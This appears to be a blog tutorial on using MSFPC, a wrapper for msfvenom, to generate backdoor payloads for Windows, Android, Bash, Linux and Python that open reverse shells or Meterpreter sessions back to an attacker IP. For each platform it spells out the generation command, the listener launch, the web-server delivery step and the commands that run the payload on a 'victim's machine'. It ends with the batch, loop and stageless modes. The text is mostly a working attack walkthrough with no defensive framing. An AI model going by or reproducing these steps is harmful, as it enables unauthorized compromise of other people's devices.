Comprehensive Guide to MSFPC


Hello Friends!!
As you all are aware of MSFvenom-A tool in Kali Linux for generating payload, is also available as MSFvenom Payload Creator (MSFPC) for generating various "basic" Meterpreter payloads via msfvenom. It is fully automating msfvenom & Metasploit is the end goal.

MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on user’s choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Author: g0tmi1k

SYNTAX
msfpc () () () () () () () ()
Create a Payload with Interactive IP Mode
Let’s create the payload for Windows platform with the help of following command

msfpc windows

When you will enter above command it will automatically confirm the interface:

Which interface should be used?
eth0, lo wan

We press 1 for eth0 and then it will start generating payload and as result give us following:

1.       Location of MSF handler file and windows meterpreter created.
2.       Command to be run to start multi handler automatically within metasploit framework.
3.       Command for file transfer through web server.



Basically the msfpc is design to reduce the user’s effort in generating payload of various platforms with different-different format of file. So when you will type “msfpc” it will display all types of platform and generate a specific format of file likewise.
Syntax: msfpc


Windows Payload

If you want to generate a payload to get meterpreter session victim’s machine which operates on Windows, then all you need to do is type following:
msfpc windows 192.168.1.109 1234
If you will not mention IP, it will automatically ask to choose interface as discussed above and choose 443 as default lport. It creates a malicious backdoor in the .exe format for 32-bit architecture. Then it will start generating the payload and as result give us details following details.

·         Location of MSF handler file and windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-1234.exe'
·         command to be run to start multi handler automatically: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
·         Command for file transfer through web server: python2 -m SimpleHTTPServer 8080



Now run the following command to launch multi/handler and web server for file transfer.
msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080



When victim will browse the following URL where it will ask to download and run the .exe file that will provide meterpreter session to the attacker.
http://192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exe
Conclusion: Earlier the attackers were using manual method to generate a payload via msfvenom command and then use Metasploit module “multi/handler” to access the reverse connection via meterpreter session and this technique was quite successfully approach to compromise a victim’s machine although took much time. But same approach is applicable with the help of MSFPC for generating various "basic" Meterpreter payloads via msfvenom.



Android Payload
If you want to generate a payload to get meterpreter session victim’s machine which operates on Android, then all you need to do is type following:
msfpc apk 192.168.1.109 1234
It creates a malicious backdoor in the .apk format. Then it will start generating the payload and as result give us following details.
·         Location of MSF handler file and android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-1234.apk'
·         Command to be run to start multi handler automatically: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
·         Command for file transfer through web server: python2 -m SimpleHTTPServer 8080



Now run the following command to launch multi/handler and web server for file transfer.
msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'

python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the application and run the .apk file that will provide meterpreter session to the attacker.
http://192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk



Hence you can observe as said above, we have meterpreter session of target’s machine.



BASH
The pro above MSFPC is that it reduces the stress to remember the format for each platform, all we need to do is just follow the above declare syntax and the rest will be managed by MSFPC automatically. Suppose I want to create a payload for Bash platform, and then it will take a few minutes in MSFPC to generate a bash payload.

msfpc bash 192.168.1.109 1234
It creates a malicious backdoor in the .sh format. Then it will start generating the payload and as result give us following:
·         Location of MSF handler file and bash meterpreter created: '/root/bash-shell-staged-reverse-tcp-1234.sh.'
·         Command to be run to start multi handler automatically: msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
·         Command for file transfer through web server: python2 -m SimpleHTTPServer 8080



Now run the following command to launch multi/handler and web server for file transfer.
msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'

python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the script and once the target run the bash script with full permission, it will give command shell.  
http://192.168.1.109/root/bash-shell-staged-reverse-tcp-1234.sh
chmod 777 bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh



Hence you can observe as said above, we have command shell of target’s machine and with the help of the following command we have upgraded it into meterpreter shell.
sessions -u 1



Linux
If you want to generate a payload to get meterpreter session victim’s machine which operates on Linux, then all you need to do is type following:
msfpc linux 192.168.1.109 4444
It creates a malicious backdoor in the .elf format. Then it will start generating the payload and as result give us following details:
·         Location of MSF handler file and Linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf
·         Command to be run to start multi handler automatically: msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
·         Command for file transfer through web server: python2 -m SimpleHTTPServer 8080




Now run the following command to launch multi/handler and web server for file transfer.
msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'

python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the application and once the target run the .elf file with full permission, it will give command shell. 
http://192.168.1.109/root/linux-shell-staged-reverse-tcp-4444.elf
chmod 777 linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf



Hence you can observe as said above, we have command shell of target’s machine and with the help of the following command we have upgraded it into meterpreter shell.
sessions -u 1


Python
If you want to generate a payload to get meterpreter session victim’s machine which operates on Python, then all you need to do is type following:
msfpc python 192.168.1.109 5555
It creates a malicious backdoor in the .py format. Then it will start generating the payload and as result give us following detaisl:
Location of MSF handler file and python meterpreter created: '/root/python-meterpreter-staged-reverse_tcp-5555.py
Command to be run to start multi handler automatically: msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080



Now run the following command to launch multi/handler and web server for file transfer.
msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'

python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the script and once the target run the python script, it will give meterpreter session. 
http://192.168.1.109/root/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py



Hence you can observe as said above, we have meterpreter session of target’s machine


Batch (Generates all Possible Combination Payloads)
 Batch is most significant Mode as it generate as much as possible combination of payload. If we want to create all payloads which can give meterpreter session then we can use the following command in that situation.
msfpc msf batch eth0
In the given below command you can observe here it has generated all possible types payload which can give meterpreter sessions. Although the rest technique is as above to execute the payload and get reverse connection.



If we want to create all payloads which can give command shell session of the target’s machine then we can use the following command in that situation.
msfpc cmd batch eth0
In the given below command you can observe here it has generated all possible types payload which can give command shell.




Loop (Generates One payload for Each Platform)
Loop is also most significant mode as it generates on of each type of payload with their default values. Hence by default will generate a payload to provide meterpreter session rather than command shell session.
msfpc verbose loop eth0
In the given below command you can observe here it has generated all possible types payload for each platform which can give meterpreter sessions. Although the rest technique is as above to execute the payload and get reverse connection.



Generating Stageless Payload
As we all know there are two types of payloads i.e. stag and stageless and by default it creates a stage payload. If you want to create a stageless payload then you can go with the following command to generate stageless payload for command shell session or meterpreter session.

msfpc stagless cmd window 192.168.1.109 
msfpc stagless msf  window 192.168.1.109 

The rest technique is as above to execute the payload and get reverse connection.



0 comments:

Post a Comment